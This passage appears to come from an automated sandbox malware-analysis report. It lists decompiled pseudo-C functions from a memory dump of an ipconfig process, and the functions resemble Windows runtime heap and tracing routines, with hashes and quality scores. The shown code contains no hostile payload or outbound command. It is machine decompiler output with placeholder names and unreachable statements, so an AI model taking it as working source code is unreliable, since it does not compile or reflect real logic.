              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5d2b313c4e3ed823a8503f6cc951ba4e7cf37c2198709b8b76c2ee2306f9a8b3
              • Instruction ID: dc668f3013c1b01c429fc14c8d0a02ebbfacf5c7bd0735ffafd784face9d44da
              • Opcode Fuzzy Hash: 5d2b313c4e3ed823a8503f6cc951ba4e7cf37c2198709b8b76c2ee2306f9a8b3
              • Instruction Fuzzy Hash: 72012C72A4021CAFCB00DFA9D9459EEB7B8EF49350F10405AFA04E7381E634A901CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E02F68ED6(intOrPtr __ecx, intOrPtr __edx) {
              				signed int _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				short _v62;
              				char _v68;
              				signed char* _t29;
              				intOrPtr _t35;
              				intOrPtr _t41;
              				intOrPtr _t42;
              				signed int _t43;
              
              				_t40 = __edx;
              				_v8 =  *0x2f8d360 ^ _t43;
              				_v28 = __ecx;
              				_v62 = 0x1c2a;
              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
              				_v24 = __edx;
              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
              				if(E02EB7D50() == 0) {
              					_t29 = 0x7ffe0386;
              				} else {
              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v68);
              				_push(0x1c);
              				_push(0x20402);
              				_push( *_t29 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
              			}


















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6a9ff6112b6f5a6a4ac9cc2b87ce4b44d0bba9018081f2aba28d8ad7f4ac6c3d
              • Instruction ID: c77e0a97e743b6b38e1d0e097e30bb9313f6d8c933bf1bd51524699cec655c00
              • Opcode Fuzzy Hash: 6a9ff6112b6f5a6a4ac9cc2b87ce4b44d0bba9018081f2aba28d8ad7f4ac6c3d
              • Instruction Fuzzy Hash: 47112171E402199FDB04DFA8D445BAEF7F4FF08340F0482AAE518EB782E6349941CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02E9DB60(signed int __ecx) {
              				intOrPtr* _t9;
              				void* _t12;
              				void* _t13;
              				intOrPtr _t14;
              
              				_t9 = __ecx;
              				_t14 = 0;
              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
              					_t13 = 0xc000000d;
              				} else {
              					_t14 = E02E9DB40();
              					if(_t14 == 0) {
              						_t13 = 0xc0000017;
              					} else {
              						_t13 = E02E9E7B0(__ecx, _t12, _t14, 0xfff);
              						if(_t13 < 0) {
              							L02E9E8B0(__ecx, _t14, 0xfff);
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
              							_t14 = 0;
              						} else {
              							_t13 = 0;
              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
              						}
              					}
              				}
              				 *_t9 = _t14;
              				return _t13;
              			}







              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction ID: 86a1a594f55f78df391e442f53a301d91319d2de83554bf8aed6fc5d5ab1b31a
              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
              • Instruction Fuzzy Hash: 7DF0FC332C15729BDB327A958CA4FA7B6968FC1B64F1A9037F3059B744DA708C02C6D1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02E9B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
              				signed char* _t13;
              				intOrPtr _t22;
              				char _t23;
              
              				_t23 = __edx;
              				_t22 = __ecx;
              				if(E02EB7D50() != 0) {
              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
              				} else {
              					_t13 = 0x7ffe0384;
              				}
              				if( *_t13 != 0) {
              					_t13 =  *[fs:0x30];
              					if((_t13[0x240] & 0x00000004) == 0) {
              						goto L3;
              					}
              					if(E02EB7D50() == 0) {
              						_t13 = 0x7ffe0385;
              					} else {
              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
              					}
              					if(( *_t13 & 0x00000020) == 0) {
              						goto L3;
              					}
              					return E02F17016(0x14a4, _t22, _t23, _a4, _a8, 0);
              				} else {
              					L3:
              					return _t13;
              				}
              			}






              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction ID: 2a59368b5a966c8e1210d9959a0222ed1af0d1c1032802913e9e6b4131b96b44
              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
              • Instruction Fuzzy Hash: 1D01FE326806809BDB23975DD804F96BB99EF8275CF08D066FB14876F1E774C800D714
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 46%
              			E02F2FE87(intOrPtr __ecx) {
              				signed int _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				signed int _v24;
              				intOrPtr _v28;
              				short _v54;
              				char _v60;
              				signed char* _t21;
              				intOrPtr _t27;
              				intOrPtr _t32;
              				intOrPtr _t33;
              				intOrPtr _t34;
              				signed int _t35;
              
              				_v8 =  *0x2f8d360 ^ _t35;
              				_v16 = __ecx;
              				_v54 = 0x1722;
              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
              				_v28 =  *((intOrPtr*)(__ecx + 4));
              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
              				if(E02EB7D50() == 0) {
              					_t21 = 0x7ffe0382;
              				} else {
              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
              				}
              				_push( &_v60);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t21 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
              			}
















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee0d73f34471cdb9baf83825c784824d1910b7875d3b968b496e85dfdd28dd37
              • Instruction ID: 5225667d4b6923393e309495df995a3239ef169009fe49fb1d08bcedae1592da
              • Opcode Fuzzy Hash: ee0d73f34471cdb9baf83825c784824d1910b7875d3b968b496e85dfdd28dd37
              • Instruction Fuzzy Hash: 0F016271A4021CAFCB14DFA8D541A6EB7F4EF05304F104559B518DB382D635D902CB40
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 48%
              			E02F5131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				short _v50;
              				char _v56;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_v8 =  *0x2f8d360 ^ _t32;
              				_v20 = _a4;
              				_v12 = _a8;
              				_v24 = __ecx;
              				_v16 = __edx;
              				_v50 = 0x1021;
              				if(E02EB7D50() == 0) {
              					_t18 = 0x7ffe0380;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              				}
              				_push( &_v56);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
              			}















              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 48%
              			E02F68F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				short _v50;
              				char _v56;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_v8 =  *0x2f8d360 ^ _t32;
              				_v16 = __ecx;
              				_v50 = 0x1c2c;
              				_v24 = _a4;
              				_v20 = _a8;
              				_v12 = __edx;
              				if(E02EB7D50() == 0) {
              					_t18 = 0x7ffe0386;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v56);
              				_push(0x10);
              				_push(0x402);
              				_push( *_t18 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
              			}















              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 46%
              			E02F51608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				short _v46;
              				char _v52;
              				signed char* _t15;
              				intOrPtr _t21;
              				intOrPtr _t27;
              				intOrPtr _t28;
              				signed int _t29;
              
              				_t26 = __edx;
              				_v8 =  *0x2f8d360 ^ _t29;
              				_v12 = _a4;
              				_v20 = __ecx;
              				_v16 = __edx;
              				_v46 = 0x1024;
              				if(E02EB7D50() == 0) {
              					_t15 = 0x7ffe0380;
              				} else {
              					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              				}
              				_push( &_v52);
              				_push(0xc);
              				_push(0x20402);
              				_push( *_t15 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
              			}














              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02EBC577(void* __ecx, char _a4) {
              				void* __esi;
              				void* __ebp;
              				void* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              
              				_t18 = __ecx;
              				_t21 = __ecx;
              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02EBC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2e711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					__eflags = _a4;
              					if(__eflags != 0) {
              						L10:
              						E02F688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
              						L9:
              						return 0;
              					}
              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
              					if(__eflags == 0) {
              						goto L10;
              					}
              					goto L9;
              				} else {
              					return 1;
              				}
              			}









              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E02ED927A(void* __ecx) {
              				signed int _t11;
              				void* _t14;
              
              				_t11 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
              				if(_t11 != 0) {
              					E02EDFA60(_t11, 0, 0x98);
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
              					E02ED92C6(_t11, _t14);
              				}
              				return _t11;
              			}





              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E02F52073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
              				void* __esi;
              				signed char _t3;
              				signed char _t7;
              				void* _t19;
              
              				_t17 = __ecx;
              				_t3 = E02F4FD22(__ecx);
              				_t19 =  *0x2f8849c - _t3; // 0x0
              				if(_t19 == 0) {
              					__eflags = _t17 -  *0x2f88748; // 0x0
              					if(__eflags <= 0) {
              						E02F51C06();
              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
              						__eflags = _t3;
              						if(_t3 != 0) {
              							L5:
              							__eflags =  *0x2f88724 & 0x00000004;
              							if(( *0x2f88724 & 0x00000004) == 0) {
              								asm("int3");
              								return _t3;
              							}
              						} else {
              							_t3 =  *0x7ffe02d4 & 0x00000003;
              							__eflags = _t3 - 3;
              							if(_t3 == 3) {
              								goto L5;
              							}
              						}
              					}
              					return _t3;
              				} else {
              					_t7 =  *0x2f88724; // 0x0
              					return E02F48DF1(__ebx, 0xc0000374, 0x2f85890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
              				}
              			}







              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 43%
              			E02F68D34(intOrPtr __ecx, intOrPtr __edx) {
              				signed int _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				short _v42;
              				char _v48;
              				signed char* _t12;
              				intOrPtr _t18;
              				intOrPtr _t24;
              				intOrPtr _t25;
              				signed int _t26;
              
              				_t23 = __edx;
              				_v8 =  *0x2f8d360 ^ _t26;
              				_v16 = __ecx;
              				_v42 = 0x1c2b;
              				_v12 = __edx;
              				if(E02EB7D50() == 0) {
              					_t12 = 0x7ffe0386;
              				} else {
              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v48);
              				_push(8);
              				_push(0x20402);
              				_push( *_t12 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
              			}













              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 36%
              			E02F68B58(intOrPtr __ecx) {
              				signed int _v8;
              				intOrPtr _v20;
              				short _v46;
              				char _v52;
              				signed char* _t11;
              				intOrPtr _t17;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				signed int _t25;
              
              				_v8 =  *0x2f8d360 ^ _t25;
              				_v20 = __ecx;
              				_v46 = 0x1c26;
              				if(E02EB7D50() == 0) {
              					_t11 = 0x7ffe0386;
              				} else {
              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v52);
              				_push(4);
              				_push(0x402);
              				_push( *_t11 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
              			}













              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02E94F2E(void* __ecx, char _a4) {
              				void* __esi;
              				void* __ebp;
              				void* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              
              				_t18 = __ecx;
              				_t21 = __ecx;
              				if(__ecx == 0) {
              					L6:
              					__eflags = _a4;
              					if(__eflags != 0) {
              						L8:
              						E02F688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
              						L9:
              						return 0;
              					}
              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
              					if(__eflags != 0) {
              						goto L9;
              					}
              					goto L8;
              				}
              				_t18 = __ecx + 0x30;
              				if(E02EBC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2e71030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					goto L6;
              				} else {
              					return 1;
              				}
              			}









              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 36%
              			E02F68CD6(intOrPtr __ecx) {
              				signed int _v8;
              				intOrPtr _v12;
              				short _v38;
              				char _v44;
              				signed char* _t11;
              				intOrPtr _t17;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				signed int _t25;
              
              				_v8 =  *0x2f8d360 ^ _t25;
              				_v12 = __ecx;
              				_v38 = 0x1c2d;
              				if(E02EB7D50() == 0) {
              					_t11 = 0x7ffe0386;
              				} else {
              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v44);
              				_push(0xffffffe4);
              				_push(0x402);
              				_push( *_t11 & 0x000000ff);
              				return E02EDB640(E02ED9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
              			}













              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 88%
              			E02EB746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
              				signed int _t8;
              				void* _t10;
              				short* _t17;
              				void* _t19;
              				intOrPtr _t20;
              				void* _t21;
              
              				_t20 = __esi;
              				_t19 = __edi;
              				_t17 = __ebx;
              				if( *((char*)(_t21 - 0x25)) != 0) {
              					if(__ecx == 0) {
              						E02EAEB70(__ecx, 0x2f879a0);
              					} else {
              						asm("lock xadd [ecx], eax");
              						if((_t8 | 0xffffffff) == 0) {
              							_push( *((intOrPtr*)(__ecx + 4)));
              							E02ED95D0();
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
              						}
              					}
              					L10:
              				}
              				_t10 = _t19 + _t19;
              				if(_t20 >= _t10) {
              					if(_t19 != 0) {
              						 *_t17 = 0;
              						return 0;
              					}
              				}
              				return _t10;
              				goto L10;
              			}









              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02ECA44B(signed int __ecx) {
              				intOrPtr _t13;
              				signed int _t15;
              				signed int* _t16;
              				signed int* _t17;
              
              				_t13 =  *0x2f87b9c; // 0x0
              				_t15 = __ecx;
              				_t16 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
              				if(_t16 == 0) {
              					return 0;
              				}
              				 *_t16 = _t15;
              				_t17 =  &(_t16[2]);
              				E02EDFA60(_t17, 0, _t15 << 2);
              				return _t17;
              			}







              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E02E9F358(void* __ecx, signed int __edx) {
              				char _v8;
              				signed int _t9;
              				void* _t20;
              
              				_push(__ecx);
              				_t9 = 2;
              				_t20 = 0;
              				if(E02ECF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
              					_t20 = L02EB4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
              				}
              				return _t20;
              			}






              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02EAFF60(intOrPtr _a4) {
              				void* __ecx;
              				void* __ebp;
              				void* _t13;
              				intOrPtr _t14;
              				void* _t15;
              				void* _t16;
              				void* _t17;
              
              				_t14 = _a4;
              				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2e711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					return E02F688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
              				} else {
              					return E02EB0050(_t14);
              				}
              			}











              C-Code - Quality: 100%
              			E02F4D380(void* __ecx, void* __edx, intOrPtr _a4) {
              				void* _t5;
              
              				if(_a4 != 0) {
              					_t5 = L02E9E8B0(__ecx, _a4, 0xfff);
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
              					return _t5;
              				}
              				return 0xc000000d;
              			}





              C-Code - Quality: 82%
              			E02F241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* _t5;
              				void* _t14;
              
              				_push(8);
              				_push(0x2f708f0);
              				_t5 = E02EED08C(__ebx, __edi, __esi);
              				if( *0x2f887ec == 0) {
              					E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
              					if( *0x2f887ec == 0) {
              						 *0x2f887f0 = 0x2f887ec;
              						 *0x2f887ec = 0x2f887ec;
              						 *0x2f887e8 = 0x2f887e4;
              						 *0x2f887e4 = 0x2f887e4;
              					}
              					 *(_t14 - 4) = 0xfffffffe;
              					_t5 = L02F24248();
              				}
              				return E02EED0D1(_t5);
              			}






              C-Code - Quality: 100%
              			E02ECA185() {
              				void* __ecx;
              				intOrPtr* _t5;
              
              				if( *0x2f867e4 >= 0xa) {
              					if(_t5 < 0x2f86800 || _t5 >= 0x2f86900) {
              						return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
              					} else {
              						goto L1;
              					}
              				} else {
              					L1:
              					return E02EB0010(0x2f867e0, _t5);
              				}
              			}






              C-Code - Quality: 100%
              			E02EC16E0(void* __edx, void* __eflags) {
              				void* __ecx;
              				void* _t3;
              
              				_t3 = E02EC1710(0x2f867e0);
              				if(_t3 == 0) {
              					_t6 =  *[fs:0x30];
              					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
              						goto L1;
              					} else {
              						return L02EB4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
              					}
              				} else {
              					L1:
              					return _t3;
              				}
              			}






              C-Code - Quality: 100%
              			E02F153CA(void* __ebx) {
              				intOrPtr _t7;
              				void* _t13;
              				void* _t14;
              				intOrPtr _t15;
              				void* _t16;
              
              				_t13 = __ebx;
              				if( *((char*)(_t16 - 0x65)) != 0) {
              					E02EAEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              					_t7 =  *((intOrPtr*)(_t16 - 0x64));
              					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
              				}
              				if(_t15 != 0) {
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
              					return  *((intOrPtr*)(_t16 - 0x64));
              				}
              				return _t7;
              			}









              C-Code - Quality: 100%
              			E02EAAAB0() {
              				intOrPtr* _t4;
              
              				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
              				if(_t4 != 0) {
              					if( *_t4 == 0) {
              						goto L1;
              					} else {
              						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
              					}
              				} else {
              					L1:
              					return 0x7ffe0030;
              				}
              			}





              C-Code - Quality: 100%
              			E02EC35A1(void* __eax, void* __ebx, void* __ecx) {
              				void* _t6;
              				void* _t10;
              				void* _t11;
              
              				_t10 = __ecx;
              				_t6 = __eax;
              				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
              					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
              				}
              				if( *((char*)(_t11 - 0x1a)) != 0) {
              					return E02EAEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              				}
              				return _t6;
              			}







              C-Code - Quality: 100%
              			E02E9DB40() {
              				signed int* _t3;
              				void* _t5;
              
              				_t3 = L02EB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
              				if(_t3 == 0) {
              					return 0;
              				} else {
              					 *_t3 =  *_t3 | 0x00000400;
              					return _t3;
              				}
              			}






              C-Code - Quality: 100%
              			E02F1A537(intOrPtr _a4, intOrPtr _a8) {
              
              				return L02EB8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
              			}




              C-Code - Quality: 100%
              			E02EB3A1C(intOrPtr _a4) {
              				void* _t5;
              
              				return L02EB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
              			}





              C-Code - Quality: 100%
              			E02EA76E2(void* __ecx) {
              				void* _t5;
              
              				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
              					return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
              				}
              				return _t5;
              			}





              C-Code - Quality: 100%
              			E02EC36CC(void* __ecx) {
              
              				if(__ecx > 0x7fffffff) {
              					return 0;
              				} else {
              					return L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
              				}
              			}




              C-Code - Quality: 100%
              			E02E9AD30(intOrPtr _a4) {
              
              				return L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
              			}




              C-Code - Quality: 100%
              			E02EB7D50() {
              				intOrPtr* _t3;
              
              				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
              				if(_t3 != 0) {
              					return  *_t3;
              				} else {
              					return _t3;
              				}
              			}





              C-Code - Quality: 100%
              			E02EC2ACB() {
              				void* _t5;
              
              				return E02EAEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              			}





              C-Code - Quality: 53%
              			E02F2FDDA(intOrPtr* __edx, intOrPtr _a4) {
              				void* _t7;
              				intOrPtr _t9;
              				intOrPtr _t10;
              				intOrPtr* _t12;
              				intOrPtr* _t13;
              				intOrPtr _t14;
              				intOrPtr* _t15;
              
              				_t13 = __edx;
              				_push(_a4);
              				_t14 =  *[fs:0x18];
              				_t15 = _t12;
              				_t7 = E02EDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
              				_push(_t13);
              				E02F25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
              				_t9 =  *_t15;
              				if(_t9 == 0xffffffff) {
              					_t10 = 0;
              				} else {
              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
              				}
              				_push(_t10);
              				_push(_t15);
              				_push( *((intOrPtr*)(_t15 + 0xc)));
              				_push( *((intOrPtr*)(_t14 + 0x24)));
              				return E02F25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
              			}











              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F2FDFA
              Strings
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F2FE2B
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F2FE01
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
              • API String ID: 885266447-3903918235